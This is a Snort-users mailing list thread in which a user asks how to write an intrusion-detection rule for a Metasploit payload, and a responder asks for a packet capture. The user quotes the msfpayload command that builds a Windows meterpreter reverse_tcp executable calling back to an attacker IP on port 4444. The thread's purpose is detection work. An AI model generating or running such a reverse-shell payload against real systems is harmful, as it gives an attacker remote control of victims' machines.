[Snort-users] how to write rule for msfpayload in linux

DFIRob rd.seclists at gmail.com
Mon Nov 20 15:31:35 EST 2017


Your link has been blocked by google drive. In the future, please share a
zip file with the password 'virus' or 'infected' to prevent automated
removal. Also, since msf is open source, I encourage you to dig into how
they implement network traffic between the implant and the C2 server.

--rob

On Sun, Nov 19, 2017 at 2:31 AM, nguyen cao <nguyenblack1995 at gmail.com>
wrote:

> On the attacker I use: msfpayload windows/meterpreter/reverse_tcp
> LHOST=(IP_attacker)​
>  msfpayload2
> <https://drive.google.com/file/d/10MzIeyeThWHMfuhNyDJTuG3Y4QJ_qjcA/view?usp=drive_web>
> ​ LPORT=4444 X > /root/Desktop/payload.exe ( in order to create file
> payload.exe).
> When I run file payload.exe on PC victim , I will take control system of
> victim. I run wireshark and match packet but I do not know where to start
> in order to write rule for type this attack
>
>
>
> 2017-11-19 2:16 GMT+07:00 DFIRob <rd.seclists at gmail.com>:
>
>> Hi, do you have a pcap that you want to alert on?
>>
>> On Sat, Nov 18, 2017 at 3:22 PM, nguyen cao via Snort-users <
>> snort-users at lists.snort.org> wrote:
>>
>>> who can help me about write rule for msfpayload in linux ?
>>> creat payload by msfpayload : msfpayload windows/meterpreter/reverse_tcp
>>> LHOST=/ /  LPORT=/ /....
>>>
>>> _______________________________________________
>>> Snort-users mailing list
>>> Snort-users at lists.snort.org
>>> Go to this URL to change user options or unsubscribe:
>>> https://lists.snort.org/mailman/listinfo/snort-users
>>>
>>> Please visit http://blog.snort.org to stay current on all the latest
>>> Snort news!
>>>
>>> Please follow these rules: https://snort.org/faq/what-is-
>>> the-mailing-list-etiquette
>>>
>>
>>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-users/attachments/20171120/d543f163/attachment.html>


More information about the Snort-users mailing list